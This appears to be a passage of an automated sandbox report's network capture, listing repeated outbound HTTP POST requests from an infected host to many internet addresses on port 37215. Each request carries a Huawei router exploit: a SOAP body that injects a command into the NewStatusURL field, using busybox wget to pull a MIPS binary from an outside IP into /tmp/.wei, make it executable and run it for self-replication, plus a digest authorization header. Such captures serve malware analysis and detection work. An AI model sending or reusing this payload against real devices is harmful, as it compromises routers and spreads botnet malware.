                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2358192.168.2.235936841.133.94.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680392027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2359192.168.2.2339940192.85.171.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680397034 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2360192.168.2.2335810197.106.39.21737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680615902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2361192.168.2.234247841.92.18.25437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680615902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2362192.168.2.2349854197.94.57.537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680634022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2363192.168.2.2338442220.88.149.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680655003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2364192.168.2.2344968197.183.111.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680655956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2365192.168.2.2350652109.183.95.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680681944 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2366192.168.2.2349310118.58.199.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680692911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2367192.168.2.2342814157.80.165.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680695057 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
